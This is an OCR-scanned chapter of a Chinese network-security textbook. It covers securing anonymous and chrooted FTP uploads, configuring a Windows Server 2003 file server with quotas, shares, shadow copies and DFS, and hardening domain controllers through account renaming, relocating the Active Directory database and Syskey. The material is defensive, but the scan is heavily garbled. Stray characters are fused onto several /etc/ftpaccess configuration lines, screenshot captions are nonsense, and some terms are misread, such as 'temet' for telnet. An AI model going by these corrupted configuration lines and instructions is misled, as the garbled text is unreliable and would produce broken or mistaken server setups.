drwxr-x--x 4 root system 512 Jun 11 13:29 incoming/ 

在 ~ftp/incoming 使 用 一 些 目 录 名 ， 只 让 你 允许 他 们 上 传 的 人 知道 。 为 了 让 别人 不 易 猜 
到 目录 名 称 ， 我 们 可 以 用 设 定 密码 的 规则 来 设 定 目 录 名 称 。 请 不 要 使 用 本 文 的 目录 名 称 范 
例 ( 避 免 被 有 心 人 士 发 现 你 的 目录 名 ， 并 上 传 文件 )。 


drwxr-x-wx 10 root system 512 Jun 11 13:54 jAjwUth2/ 
drwxr-x-wx 10 root system 512 Jun 11 13:54 MhaLL-iF/ 


这 是 


很 重要 的 一 点 是 , 一 旦 目录 名 被 有 意 无 意 地 泄露 出 来 ， 那 这 个 方法 就 没什么 保护 


作用 。 只 要 目录 名 称 被 大 部 分 人 知道 ， 就 无 法 保护 那些 要 限定 使 用 的 区 域 了 。 假 如 目录 名 
被 大 家 所 知道 ， 屠 你 就 得 选择 删除 或 更 改 那 些 目录 名 。 
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3. 只 使 用 一 块 硬盘 


假如 你 想 要 在 你 的 FTP 站 提供 上 传 的 服务 , 而 你 又 没 办 法 去 修改 FTP daemon, 那么 你 
可 以 将 所 有 上 传 的 资料 集中 在 同一 个 挂 (mount) 在 ~ftp/incoming 上 的 文件 系统 。 可 以 的 话 ， 
将 一 颗 单 独 的 硬盘 挂 (mount) 在 ~ftp/incoming 上 。 系 统管 理 者 应 持续 监视 这 个 目录 
(~ftp/incoming)， 如 此 便 可 知道 开放 上 传 的 目录 是 否 有 问题 。 

匿名 FTP 可 以 很 好 地 限制 用 户 只 能 在 规定 的 目录 范围 内 活动 , 但 正式 的 FTP 用 户 默认 
不 会 受到 这 种 限制 。 这 样 ， 就 可 以 自由 在 根 目录 、 系 统 目录 、 其 他 用 户 的 目录 中 读 取 一 些 
允许 其 他 用 户 读 取 的 文件 。 

如 何 才能 把 指定 的 用 户 像 匿名 用 户 一 样 限 制 在 他 们 自己 的 目录 中 呢 ? 以 下 我 们 以 red 
hat 和 wu-ftp 为 例 做 一 下 介绍 。 

(1) 创建 一 个 组 ， 用 groupadd 命令 ， 一 般 可 以 就 用 ftp 组 ， 或 者 任何 组 名 。 

----- 相 关 命 令 : groupadd ftpuser 

----- 相 关 文件 : /etc/group 

----- 相 关 帮 助 : man groupadd 

(2) 创建 一 个 用 户 ， 如 testuser， 建 立 用 户 可 用 adduser 命令 。 如 果 你 已 在 先前 建立 了 
testuser 这 个 用 户 ， 可 以 直接 编辑 /etc/passwd 文件 ， 把 这 个 用 户 加 入 到 ftpuser 这 个 组 中 。 

----- 相 关 命 令 : adduser testuser -g ftpuser 

----- 相 关 文件 : /etc/passwd 

----- 相 关 帮 助 : man adduser 

(3) ”修改 /etc/ftpaccess 文件 ， 加 入 guestgroup 的 定义 : guestgroup ftpuser， 加 的 是 最 后 5 行 。 


compress yes all 
tar yes all 
chmod no anonymous 
delete no anonymous 
overwrite no anonymous 
rename no anonymous 
高 chmod yes guest 
客 delete Yes guest 
体 overwrite yes guest 
蓝 rename yes guest 
材 guestgroup ftpuser 
此 除了 加 guestgroup ftpuser 这 行 ， 其 他 4 行 也 要 加 上 ， 和 否则 用 户 登录 后 ， 虽 然 可 以 达到 
币 用 户 不 能 返回 上 级 目录 的 目的 ， 但 是 却 只 能 上 传 ， 不 能 覆盖 、 删 除 文件 ! 
休 相关 命令 : vi /etc/ftpaccess 


相关 文件 : /etc/ftpaccess 
相关 帮助 : man ftpaccess, man chroot 


(4) 向 这 个 用 户 的 根 目录 下 复制 必要 的 文件 , 复制 ftp server 自 带 的 目录 , 把 /home/ftp/ 


@ 
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下 的 bin、 lib 两 个 目录 复制 到 这 个 用 户 的 根 目 录 下 , 因为 一 些 命令 (主要 是 ls) 需 要 Lib 支持 ， 
否则 不 能 列 目录 和 文件 。 
相关 命令 : 


cp -rf /home/ftp/lib /home/testuser;cp -rf /home/ftp/bin /home/testuser 


(5) 关 掉 用 户 的 temet 权 ， 在 /etc/shells 里 加 一 行 /dev/null ， 然 后 可 以 直接 编辑 
/etc/passwd 文件 ， 把 用 户 的 shell 设置 为 /dev/null。 

相关 命令 : vi /etc/passwd 

这 一 步 可 以 在 步骤 2 中 创建 一 个 用 户 时 就 先 做 好 。 


----- 相 关 命 令 : adduser testuser -g ftpuser -s /dev/null 


8.4 文件 服务 器 的 安全 架设 


文件 服务 是 局 域 网 最 常用 的 服务 之 一 , 以 Windows NT 系统 开始 , 随 着 Windows Server 
系统 家 族 的 不 断 升级 换代 而 保留 至 今 。 在 局 域 网 中 搭建 文件 服务 器 以 后 ， 就 可 以 通过 设置 
用 户 对 共享 资源 的 访问 权限 来 保证 共享 资源 的 安全 。 本 节 以 Windows Server 2003 系统 为 
例 ， 简 介 搭 建文 件 服务 器 的 方法 。 


8.4.1 启用 并 配置 文件 服务 


Windows Server 2003 的 管理 工具 中 有 一 项 功能 叫做 “管理 您 的 服务 器 ”， 启 动 该 工具 
之 后 ， 可 以 看 到 当前 服务 器 上 启用 的 所 有 服务 ， 如 图 8-8 所 示 ， 并 可 对 这 些 服务 进行 管理 。 
单 击 该 界面 上 的 “添加 或 删除 角色 ”链接 ,将 启动 一 个 配置 服务 器 的 向 导 ， 如 图 8-9 所 示 。 
单 击 “ 下 一 步 ” 按 钮 进入 到 ”步骤 ， 在 Windows Server 2003 支持 的 角色 列表 
中 选择 “文件 服务 器 ”并 单 击 “ 下 一 步 ” 按 钮 ， 如 图 8-10 所 示 ， 开 始 启用 和 配置 文件 服务 
的 过 程 。 
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图 8-8 管理 服务 器 
根据 系统 提示 进行 配额 设置 ， 磁 盘 配 额 功 能 可 以 限制 用 户 对 磁盘 空间 的 使 用 ， 方 便 进 
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行 磁盘 空间 管理 。 将 磁盘 空间 限制 设置 为 300MB， 将 警告 级 别 设置 为 260MB， 并 勾 选 “ 拒 
绝 将 磁盘 空间 给 超过 配额 限制 的 用 户 ” 这 一 选项 。 这 种 情况 下 用 户 将 无 法 使 用 超过 300MB 
以 上 的 硬盘 空间 , 并 且 当 用 户 使 用 的 空间 达到 设置 的 260MB 的 警戒 线 时 ,记录 一 个 系统 事 
件 ， 如 图 8-11 所 示 。 
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图 8-9 “配置 您 的 服务 器 向 导 ” 对 话 框 
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捷 为 此 服务 器 的 新 用 户 设置 球 认 覃 参 宇 问 配额 ) 
将 磁盘 宁 间 限制 为 人 5 夯 司 
将 于 周记 别 设 轩 为 到) 2 节 吕 司 
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8-11 磁盘 配额 设置 


抽 中 上 | 著 2 和 看 万 欧 攻 硝 忧 夺 安 全 三 王 


完成 配额 设置 后 ， 单 击 “ 下 一 步 ”按钮 进入 索引 服务 设置 界面 ， 默 认 的 选项 是 不 启用 
索引 服务 。 虽 然 索引 服务 可 以 加 快 文件 检索 的 速度 ,但 是 由 于 它 要 消耗 不 少 的 服务 器 资源 ， 

所 以 如 果 不 需 要 很 频繁 检索 文件 的 话 ， 建 议 保留 默认 的 设置 ， 如 图 8-12 所 示 。 
[EIEEED x 


文件 服务 器 索引 服务 [时 
用 户 可 以 为 特定 间或 字符 搜索 已 索引 的 文件 。 | 


索引 艰 务 格 文 件 的 内 容 编 录 于 共享 的 文件 夹 里 以 便 用 户 搜索 。 案 引 服 务 当前 正在 运行 。 
人 [i 只 有 用 户 经 常 在 此 服务 器 上 搜索 文件 内 容 时 才 应 该 
您 起 在 这 人 台 服 务 器 上 使 用 “索引 服务 ” 吗 ? 


个 是 ， 不 要 关闭 索引 服务 
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8-12 不 启用 索引 服务 


在 确认 以 上 设置 之 后 ， 安 装 向 导 会 弹出 一 个 用 于 建立 共享 文件 夹 的 向 导 。 首 先 需 要 先 
择 共 享 文件 夹 的 路 径 ， 例 如 CInetpubhome， 如 图 8-13 所 示 。 之 后 进入 维护 共享 名 和 关于 
该 共享 描述 的 界面 ， 通 常情 况 下 维持 默认 设置 即 可 。 单 击 “ 下 一 步 ”按钮 ， 开 始 为 共享 设 
置 权 限 ， 基 本 的 权限 包括 了 完全 访问 和 读 写 权限 。 


文件 卖 路 径 
请 指定 要 共享 的 文件 夹 路 径 。 


计算 机 名 5); 


请 输入 修 要 共享 的 文件 夹 路 径 ,或 单 击 “ 浏 览 ”选择 文件 到 或 添加 新 文件 夹 。 
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图 8-13 “共享 文件 夹 向 导 ” 对 话 框 
选择 “使 用 自 定义 共享 和 文件 夹 权限 ”， 单 击 “ 自 定义 ”按钮 之 后 弹出 “ 自 定义 权限 ” 


设置 界面 ， 如 图 8-14 所 示 。 在 这 里 可 以 根据 需要 对 不 同 用 户 设置 不 同 的 权限 ， 例 如 可 以 对 
Administrators 用 户 组 设置 完全 控制 以 赋予 所 有 管理 员 对 该 共享 文件 夹 的 全 部 管理 权限 ， 为 
Guest 用 户 设 置 读 取 权 限 ， 使 匿名 用 户 可 以 下 载 该 文件 夹 中 的 文件 ， 同 时 删除 原 有 的 
Everyone 选项 ， 屏 蔽 所 有 其 他 用 户 权限 ， 如 图 8-15 所 示 。 
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权限 
请 指定 此 共享 的 权限 - 


使 用 下 列 基本 共享 权限 或 自 哇 自 定义 共享 和 文件 夹 权限 。 
个 所 有 用 户 有 只 读 访 问 权限 A) 


个 管理 员 有 完全 访问 权限 ; 其 地 用 户 有 只 读 沪 问 权 限 四) 
人 管理 员 有 完全 访问 权限 ; 其 地 用 户 有 读 写 访 问 权 限 
人 合用 自 定义 共享 和 文件 天 权限 WD。 [ 目 EXE 


图 8-15 “ 自 定义 权限 ”对 话 框 
至 此 就 完成 了 基本 的 共享 设置 ， 如 果 还 有 其 他 文件 夹 需要 设置 成 共享 ， 可 以 在 关闭 该 
向 导 之 前 选中 “ 当 单 击 “关闭 ”时 ， 再 次 运行 该 向 导 来 共享 另 一 个 文件 夹 ”的 选项 继续 进 
行 下 一 个 共享 的 设置 ， 如 图 8-16 所 示 。 结 束 所 有 向 导 之 后 ， 可 以 看 到 “管理 您 的 服务 器 ” 
界面 中 多 了 一 项 “文件 服务 器 ”的 内 容 ， 如 图 8-17 所 示 ， 单 击 “ 管 理 此 文件 服务 器 ”链接 
就 可 以 打开 文件 服务 器 管理 界面 ， 如 图 8-18 所 示 。 在 此 可 以 进行 各 种 文件 服务 的 管理 。 
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图 8-16 ”共享 文件 夹 向 导 
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8-18 “文件 服务 器 管理 ”界面 


另外 ， 在 进入 右键 菜单 的 属性 条 目 时 ， 也 可 以 进行 共享 和 权限 等 管理 ， 但 是 只 有 在 单 
击 的 对 象 是 磁盘 分 区 的 时 候 才 能 应 用 配额 功能 ， 因 为 配额 功能 是 针对 磁盘 卷 来 执行 的 ， 而 
且 该 卷 必 须 是 NTFS 格式 的 。 


8.4.2 文件 的 备份 与 还 原 


由 于 数据 的 安全 性 和 可 用 性 对 于 文件 服务 器 来 说 也 是 非常 重要 的 ， 所 以 在 设置 完 文件 
服务 器 的 权限 和 配额 等 参数 之 后 ， 需 要 对 文件 进行 备份 和 还 原 工作 。 Windows Server 2003 
的 备份 功能 使 用 了 称 为 卷 影 副本 (Volume Shadow Copy) 的 技术 。 在 文件 服务 器 管理 界面 可 
以 找到 “备份 文件 服务 器 ”链接 ， 在 命令 行 执行 ntbackup 命令 可 以 获得 与 单 击 该 链接 相同 
的 效果 ， 即 执行 备份 向 导 ， 如 图 8-19 所 示 。 

将 “总 是 以 向 导 模 式 启动 ”的 选项 勾 掉 ， 在 下 次 执行 该 命令 的 时 候 即 可 直接 进入 “ 备 
份 工具 ”界面 。 在 该 界面 中 可 以 看 到 ，Windows Server 2003 除了 备份 和 还 原 功能 之 外 还 包 
括 了 一 项 称 为 自动 系统 恢复 向 导 (AMR) 的 功能 ， 该 功能 主要 用 于 对 系统 分 区 进行 备份 ， 这 
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里 主要 讲解 以 卷 影 副本 技术 为 基础 的 标准 备份 功能 ， 用 户 可 以 根据 系统 指示 进行 操作 。 


欢迎 使 用 备份 或 还 原 向 导 


这 个 向 导 和 帮助 您 备份 或 还 原 计 算 机 上 的 文件 和 设置 
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要 约 糯 ,请 单 击 “ 下 一 步 ”。 


EF 0) 取消 


图 8-19 备份 或 还 原 向 导 

进行 这 些 操作 需要 客户 端 机 器 上 安装 卷 影 副本 客户 端 程序 ， 通 过 这 台 客 户 端 机 器 浏览 
到 文件 服务 器 上 的 共享 之 后 ， 在 该 共享 或 该 共享 中 的 文件 上 单 击 右键 ， 其 属性 对 话 框 中 有 
一 个 “以 前 的 版 本 ”选项 页 。 在 这 里 显示 了 文件 以 前 保存 过 的 所 有 版 本 ， 可 以 将 其 恢复 成 
任意 一 个 版 本 。 只 有 管理 员 组 的 成 员 可 以 设置 卷 影 副 本 功能 ， 并 且 卷 影 副 本 必须 在 NTFS 
格式 的 磁盘 卷 上 才能 实现 。 卷 影 副本 默认 在 启用 该 功能 的 卷 上 保留 10% 的 空间 ， 用 以 保存 
备份 数据 (最 少 100MB)， 一 旦 超过 空间 的 限制 将 覆盖 早先 创建 的 副本 。 

启用 卷 影 副本 功能 非常 简单 ， 在 文件 服务 器 管理 界面 中 找到 “配置 卷 影 副本 ”链接 ， 
也 可 以 在 NTFS 卷 的 右键 属性 菜单 里 找到 卷 影 副 本 的 选项 页 ， 通 过 这 两 种 方式 可 以 进入 同 
样 的 管理 界面 ,实现 对 卷 影 副本 的 启用 、 禁 用 以 及 容量 和 时 间 计 划 等 设置 , 如 图 8-20 所 示 。 


洗 用 户 一 一 
其中 
讲 单 击 此 处 。 
选择 一 个 卷 四 
郑 下 次 运行 时 间 共享 已 使 用 

3 已 茜 用 


图 8-20 ” 卷 影 副本 


在 “备份 工具 ”管理 界面 中 ， 用 户 可 以 指定 哪些 文件 (包括 系统 注册 表 数据 及 引导 文件 
等 ) 需 要 参与 到 备份 计划 中 来 ， 也 可 以 指定 执行 这 些 备 份 操作 的 时 间 计 划 。 这 些 备 份 操作 都 
是 基于 卷 影 副 本 技术 的 ， 备 份 的 结果 文件 要 稍 大 于 备份 的 内 容 ， 如 图 8-21 所 示 。 
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图 8-21 “备份 工具 ”管理 界面 

建议 用 户 维护 一 个 按 周 进行 的 备份 操作 ， 将 所 有 数据 重新 备份 一 次 ， 备 份 过 的 文件 将 
被 标记 为 “已 备份 过 ”; 在 此 同时 维护 一 个 按 日 进行 的 差异 备份 计划 ， 备 份 那些 每 天 修改 
过 的 文件 。 应 用 这 种 组 合计 划 进 行 数据 备份 更 加 便于 管理 ， 而 且 能 够 有 效 保证 数据 的 可 恢 
复 性 。 

需要 注意 的 是 ， 卷 影 副本 备份 占用 空间 的 数量 不 仅仅 取决 于 备份 文件 的 大 小 ， 更 决定 
于 文件 修改 的 频率 ， 对 于 系统 分 区 这 样 有 很 多 交换 文件 操作 的 分 区 来 说 ， 不 要 进行 整个 磁 
盘 卷 的 备份 操作 。 


8.4.3 分布 式 文件 系统 


分 布 式 文件 系统 是 Windows 系统 网 络 存储 构架 的 核心 技术 之 一 ， 可 以 实现 将 网 络 上 位 
于 不 同位 置 的 文件 挂 接 在 统一 命名 空间 之 下 。 在 管理 工具 中 启动 “分 布 式 文件 系统 ”工具 ， 
首先 要 建立 一 个 根 目 录 。 用 右键 单 击 管理 界面 左 侧 的 “分 布 式 文件 系统 ”， 选 择 “ 新 建 根 
目录 ”， 按 照 向 导 填 写 所 需要 的 信息 就 可 以 完成 操作 。 向 导 提示 如 图 8-22 至 图 8.27 所 示 。 
继续 用 右键 单 击 刚刚 建立 的 根 目录 ， 选 择 “ 新 建 链接 ”， 可 以 将 位 于 网 络 中 其 他 计算 机 上 
的 共享 目录 链接 到 刚才 建立 的 根 目录 上 ， 如 图 8-28 所 示 。 将 所 有 要 汇集 到 这 个 根 目 录 上 的 
共享 目录 都 链接 过 来 之 后 ， 就 可 以 通过 浏览 这 个 根 目 录 下 的 目录 树 访问 这 些 文件 ， 而 不 再 
需要 通过 访问 多 个 实际 的 网 络 位 置 使 用 这 些 文件 。 
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图 8-22 分 布 式 文件 系统 
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根 目录 名 称 
您 必须 为 每 一 个 DFS 根 目录 提供 一 个 唯一 的 名 称 。 
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根 目 录 共 享 
指定 的 共享 不 存在 。 在 以 下 位 置 创 肤 一 个 新 共享 。 
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8-26 设置 根 目 录 共 享 
半音 术 和 训导 


正在 完成 “新 建 根 目录 向 导 ” 
和 时 


去 服务 | 60ee8577128a4a9, tong com 


共和 闪 人 


要 关闭 此 向 导 并 创建 根 目录 ， 请 单 击 “ 完 成 ”。 


图 8-27 完成 根 目录 创建 


nn 


链接 名 称 QD) ; 


预览 到 | 尾 接 的 VNC 路 径 0D) 
|\\B0EES577128A4A9\qq\ 


目标 路 径 共享 文件 夫 ) @): 


注释 @): 


以 秒 计算 的 客户 端 缓 存 这 个 引用 所 需 的 时 间 CC) 


1800 


确定 取消 


图 8-28 ”新建 链接 


( 
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8.5 ” 域 控制 器 的 安全 架设 


域 控制 器 正如 其 名 ， 它 具有 对 整个 Windows 域 以 及 域 中 的 所 有 计算 机 的 管理 权限 。 因 
此 你 必须 花费 更 多 的 精力 来 确保 域 控制 器 的 安全 ， 并 保持 其 安全 性 。 本 文 将 带 你 了 解 一 些 
在 域 控制 器 上 应 该 部 署 的 安全 措施 。 


8.5.1 域 控制 器 的 物理 安全 


第 一 步 (也 是 常常 被 忽视 的 一 步 ) 就 是 要 保障 你 的 域 控制 器 的 物理 安全 。 也 就 是 说 ， 你 
应 该 将 服务 器 放 在 一 间 带 锁 的 房间 , 并 且 严 格 的 审核 和 记录 该 房间 的 访问 情况 。 不 要 有 “ 隐 
项 起 来 就 具有 很 好 的 安全 性 ”这 样 的 观点 ， 错 误 地 认为 将 这 样 一 台 关 键 的 服务 器 放 在 一 个 
偏僻 的 地 方 而 不 加 以 任何 保护 ， 就 可 以 抵御 那些 项 固 的 数据 间谍 和 破坏 分 子 的 攻击 。 

因为 专门 从 事 犯 罪 预防 研究 的 警察 告诉 我 们 ， 我 们 是 没有 办 法 使 自己 的 家 、 公 司 、 汽 
车 ， 当 然 也 包括 我 们 的 服务 器 具有 百分之百 的 安全 性 的 。 安 全 措施 并 不 能 保证 你 的 贵重 物 
品 不 被 那些 “坏人 ” 拿 到 ， 它 只 能 增加 他 们 获取 贵重 物品 的 难度 。 如 果 你 能 让 他 们 的 攻击 
过 程 持续 更 长 的 时 间 ， 那 么 他 们 放弃 攻击 或 停止 尝试 ， 甚 至 将 他 们 当场 抓 住 的 可 能 性 都 会 
大 大 增加 。 

物理 安全 之 后 ， 就 应 该 部 署 多 层 防 御 计 划 。 带 锁 的 服务 器 间 只 是 第 一 层 ， 这 只 能 被 认 
为 是 周边 安全 ， 就 像 你 院子 周边 的 篇 笛 或 者 你 家 房 门 的 锁 。 万 一 周边 安全 被 突破 ， 就 应 该 
为 保护 目标 (此 时 即 DC) 进 一 步 设置 一 些 安 全 措施 以 保护 它们 。 你 可 能 会 安装 安全 警报 系 
统 ， 以 便当 你 的 篇 钨 或 者 门 锁 遭 到 破坏 的 时 候 ， 通 知 你 或 者 警察 。 同 样 ， 你 应 该 考虑 在 服 
务 器 间 部 署 警报 系统 ， 当 未 授权 用 户 (他 不 知道 解除 警报 系统 的 密码 ) 进 入 服务 器 间 的 时 候 ， 
它 就 发 出 声音 警报 。 另 外 还 可 以 考虑 在 门 上 安装 探测 器 ， 以 及 红外 探测 器 以 防止 通过 门 、 
窗 及 其 他 孔洞 (我 们 强烈 建议 ， 尽 可 能 减少 门 、 窗 及 孔洞 的 数量 ) 的 非法 进入 。 

当 你 从 里 至 外 的 部 署 你 的 多 层 安 全 计划 时 ， 你 应 该 反复 问 自己 一 个 问题 “如 果 这 个 安 
全 措施 失效 了 怎么 办 ? 我 们 可 以 在 入 侵 者 的 攻击 线路 上 部 署 哪些 新 的 障碍 ? ”就 像 你 将 自 
己 的 金钱 和 珠宝 放 在 一 个 有 管 矢 的 、 带 锁 的 、 有 警报 系统 保护 的 房间 中 ， 你 也 应 该 考虑 服 
务 器 自身 的 安全 。 下 面 有 一 些 准则 

(1) 移 除 所 有 的 可 移动 存储 设备 驱动 器 ， 如 光驱 、 外 置 硬盘 、Zip 驱动 器 、 闪 存 驱 动 器 
等 。 这 将 增加 入 侵 者 向 服务 器 上 传 程序 (如 病毒 或 下 载 数 据 的 难度 。 如 果 你 不 使 用 这 些 设 
备 ， 你 也 可 以 移 除 这 些 外 部 设备 需要 使 用 的 端口 (从 BIOS 中 关闭 或 物理 移 除 )。 这 些 端口 包 
括 USB/IEEE 1394、 串 口 、 并 口 、SCSI 接口 等 。 

(2) 将 机 箱 锁 好 ， 以 防止 未 授权 用 户 盗窃 硬盘 ， 或 损坏 机 器 组 件 。 

(3) 将 服务 器 放 在 密闭 带 锁 的 服务 器 机 架 中 (确保 提供 良好 的 通风 设备 )， 电 源 设备 最 
好 也 能 设置 在 服务 器 机 架 中 。 以 避免 入 侵 者 能 够 方便 的 切断 电源 或 UPS， 从 而 干扰 系统 的 
电力 供应 。 


由 中 上 上 1 荔 草 万 欧 攻 硝 翌 务 安 全 瑟 生 


8.5.2 ”防止 域 控制 器 的 远程 入 侵 


如 果 你 认为 你 的 物理 安全 计划 已 经 足够 完美 ， 那 么 你 就 要 将 你 的 注意 力 转移 到 防止 黑 
客 和 攻击 者 通过 网 络 访问 你 的 域 控制 器 。 当 然 ，“ 最 好 的 ”方法 是 将 域 控制 器 从 网 络 中 断 
开 ， 但 是 如 果 这 样 ， 域 控制 器 也 就 毫 无 用 处 了 。 因 此 ， 你 要 通过 一 些 步 又， 加固 它们 ， 以 
抵御 一 般 的 攻击 方法 。 

1. 保障 域 账号 的 安全 

最 简单 的 (对 于 黑客 来 说 )， 最 让 人 意 想不到 的 ， 也 是 最 常用 的 方法 就 是 通过 一 个 合法 
的 账号 密码 登录 系统 ， 以 获得 网 络 和 域 控制 器 的 访问 权限 。 

在 一 个 典型 的 安装 中 ， 黑 客 如 想 登 录 系统 ， 只 需要 两 个 东西 ， 一 个 合法 账号 ， 以 及 它 
对 应 的 密码 。 如果 你 仍 使 用 的 是 默认 的 管理 员 账 号 一 一 Administrator, 这 将 使 黑客 的 入 侵 容 
易 很 多 。 他 需要 做 的 只 是 收集 一 些 信息 。 与 其 他 账号 不 同 ， 这 个 默认 的 管理 员 账 号 ， 不 会 
因为 多 次 失败 登录 而 被 锁定 。 这 也 就 意味 着 ， 黑 客 只 要 不 停 的 猜测 密码 (通过 “暴力 破解 ” 
的 方法 破解 密码 )， 直 到 他 拿 到 管理 员 权 限 为 止 。 

这 就 是 为 什么 你 应 该 做 的 第 一 件 事 是 把 系统 内 置 账号 改名 。 当 然 ， 如 果 你 只 是 改名 而 
忘记 修改 默认 的 描述 (“计算 机 / 域 的 内 置 管理 账号 ”) 也 没有 什么 意义 。 所 以 你 要 避免 入 侵 
者 快速 的 找 出 拥有 管理 员 权限 的 账号 。 当 然 ， 请 记 住 ， 你 所 做 的 措施 都 只 能 减 慢 入 侵 者 入 
侵 的 速度 。 一 个 坚定 的 、 有 能 力 的 黑客 还 是 能 够 绕 过 你 的 安全 措施 的 (例如 ， 管 理 员 账号 的 
SID 是 不 能 更 改 的 ， 它 通常 是 以 500 结尾 的 。 有 一 些 黑 客 可 以 利用 工具 SID 号 来 辨别 出 管 
理 员 的 账号 )。 

在 Windows Server 2003 中 ,完全 的 禁用 内 置 管理 员 账 号 成 为 可 能 。 当 然 如 果 你 想 那 样 
做 ， 必 须要 先 创建 另外 的 一 个 账号 ， 并 赋予 它 管理 员 的 权限 。 否 则 ， 你 将 发 现 你 自己 也 无 
法 执行 某 些 特权 任务 了 。 当 然 内 置 的 来 宾 账 号 是 应 该 被 禁止 的 (默认 就 是 如 此 )。 如 果 一 些 
用 户 需 要 具有 来 宾 的 权限 ， 为 他 创建 一 个 名 字 没 那么 显眼 的 新 账号 ， 并 限制 它 的 访问 。 

所 有 的 账号 ， 特 别 是 管理 账号 都 应 该 有 一 个 强壮 的 密码 。 一 个 强壮 的 密码 应 该 包含 8 
位 以 上 的 字符 、 数 字 或 符号 ， 应 该 大 小 写 混 排 ， 而 且 不 应 该 是 字典 中 的 单词 。 用 户 必 须要 
注意 , 不 要 将 密码 用 笔 写 下 来 或 者 告诉 其 他 人 (社交 工程 术 也 是 未 授权 取得 访问 权限 的 常用 
方法 )。 还 可 以 通过 组 策略 来 强制 要 求 密码 在 一 定 的 基础 上 进行 变化 。 

2. 重 定向 活动 目录 数据 库 

活动 目录 的 数据 库 包 含 了 大 量 的 核心 信息 ， 是 应 该 妥善 保护 的 部 分 。 方 法 之 一 就 是 将 
这 些 文件 从 被 攻击 者 熟知 的 默认 位 置 (在 系统 卷 中 ) 转 移 到 其 他 位 置 。 如 果 想 进行 更 深入 的 
保护 ， 考 虑 把 AD 数据 库 文件 移动 到 一 个 有 宛 余 或 者 镜像 的 卷 ， 以 便 磁 盘 发 生 错误 的 时 候 
你 还 能 恢复 它 。 

活动 目录 的 数据 库 文 件 包 括 : Ntds.dit; Edb.log; Temp.edb。 

你 可 以 按照 以 下 步骤 , 通过 NTDSUTIL.EXE 这 个 工具 来 转移 活动 目录 的 数据 库 和 日 志 
文件 : 

(1) 重新 启动 域 控 制 器 。 


® 


(> i 计算 机 网 络 安全 


潼 洲 党 粮 半 ”车 潍 民 从 睹 册 到 招 于 


(2) 在 启动 的 时 候 按 下 F8 键 ， 以 访问 高 级 选项 菜单 。 

(3) 在 菜单 中 选择 目录 服务 恢复 模式 。 

(4) 如 果 你 装 有 一 个 以 上 的 Windows Server 2003， 选 择 正确 的 那个 ， 按 回 车 键 继 续 。 

(5) 在 登录 提示 的 时 候 ， 使 用 当时 你 提升 服务 器 时 指定 的 活动 目录 ， 人 恢复 账号 的 用 户 
密码 登录 。 

(6) 单 击 “ 开 始 ” 选 择 “ 运 行 ”命令 ， 输 入 CMD， 运 行 命令 提示 行 。 

(7) 在 命令 提示 行 中 ， 输 入 NTDSUTIL.EXE， 并 执行 。 

(8) 在 NTDSUTIL 的 提示 行 中 ， 输 入 FILES 。 

(9) 选择 你 想 要 移动 的 数据 库 或 者 日 志文 件 ， 输 入 MOVE DB TO 或 者 MOVE LOGS 
TO 

(10) 输入 两 次 QUIT， 退 出 NTDSUTIL， 返 回 到 命令 提示 行 ， 并 关闭 命令 提示 行 窗口 。 

(11) 再 次 重新 启动 域 控制 器 ， 以 正常 模式 进入 Windows Server 2003 。 


3. 使 用 Syskey 保障 密码 信息 的 安全 


保存 在 活动 目录 中 的 域 账号 密码 信息 是 最 为 敏感 的 安全 信息 。 系 统 密 钥 (System Key - 
Syskey) 就 是 用 来 加 密 保存 在 域 控制 器 的 目录 服务 数据 库 中 的 账号 密码 信息 的 。 

Syskey 一 共有 三 种 工作 模式 : 

(1) 所 有 Windows Server 2003 中 默认 采用 的 ， 计 算 机 随机 产生 一 个 系统 密 钥 (system 
key)， 并 将 密 钥 加 密 后 保存 在 本 地 。 在 这 种 模式 中 ， 你 可 以 像 平时 一 样 的 登录 本 地 计算 机 。 

(2) 系统 密 钥 使 用 和 模式 一 中 是 同样 的 生成 方式 和 存储 方式 ， 但 是 它 使 用 一 个 由 管理 
员 指定 的 附加 密码 以 提供 更 进一步 的 安全 性 。 当 你 重启 计算 机 的 时 候 ， 你 必须 在 启动 的 时 
候 输入 管理 员 指 定 的 附加 密码 ， 这 个 密码 不 保存 在 本 地 。 

(3) 安全 性 最 高 的 操作 方法 。 计 算 机 随机 产生 的 系统 密 钥 将 被 保存 在 一 张 光盘 上 ， 而 
不 是 计算 机 本 地 。 如 果 你 没有 光盘 的 物理 访问 权限 ， 并 在 系统 提示 时 插入 该 光盘 ， 你 就 无 
法 引导 系统 。 

附注 : 在 使 用 模式 二 和 模式 三 之 前 ， 请 先 考 虑 他 们 相关 的 特性 。 例 如 ， 可 能 会 需要 管 
理 员 在 本 地 插入 含有 syskey 密码 的 光盘 ， 这 就 意味 着 ， 在 服务 器 端 不 插入 光盘 的 情况 下 ， 
你 将 无 法 实现 服务 器 远程 重启 。 

你 可 以 通过 以 下 方法 创建 system key: 

(1) 单 击 “ 开 始 ” 一 “运行 ”， 输 入 CMD， 运 行 命令 提示 行 。 

(2) 在 命令 提示 行 中 ， 输 入 SYSKEY， 并 执行 。 

(3) 单 击 UPDATE。 选 中 ENCRYPTION ENABLED。 

(4) ”如果 需要 一 个 syskey 的 开始 密码 ， 单 击 PASSWORD STARTUP。 

(5) 输入 一 个 强健 的 密码 (密码 可 以 含有 12 到 128 个 字符 )。 

(6) 如 果 你 不 需要 开始 密码 ， 单 击 SYSTEM GENERATED PASSWORD。 

(7) 默认 的 选项 是 STORE STARTUP KEY LOCALLY。 如 果 你 想 要 将 密码 保存 在 光盘 
中 ， 选 中 STORE STARTUP KEY ON FLOOPY DISK 。 

如 果 你 使 用 模式 三 ， 将 密码 保存 在 光盘 中 ， 请 确保 该 光盘 有 备份 。 
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小 结 


网 络 应 用 服务 的 安全 是 网 络 与 信息 安全 中 重要 组 成 部 分 。 在 本 文中 ， 我 们 讨论 了 保证 
IIS 自身 的 安全 性 ，IHS Web 服务 器 的 安全 架设 ，FTP 服务 器 的 安全 架设 ， 匿 名 FTP 的 安全 
设 定 ， 文 件 服务 器 的 安全 搭建 ， 如 何 保障 域 控制 器 的 物理 安全 ， 如 何 保障 域 账 号 的 安全 性 ， 
重 定位 活动 目录 的 数据 库 文件 , 以 及 如 何 使 用 Syskey 工具 来 保护 存储 在 域 控制 器 中 的 账号 
密码 信息 。 


本 章 习 题 


一 、 填 空 题 
1. WWW 服务 主要 通过 协议 向 用 户 提供 网 页 信息 


2. 默认 时 ，FTP 服务 所 使 用 的 TCP 端口 为 。 
3. ”如 果 一 个 Web 网 站 所 使 用 的 耳 地 址 为 : 192.168.0.200，TCP 端口 号 为 : 4040， 则 


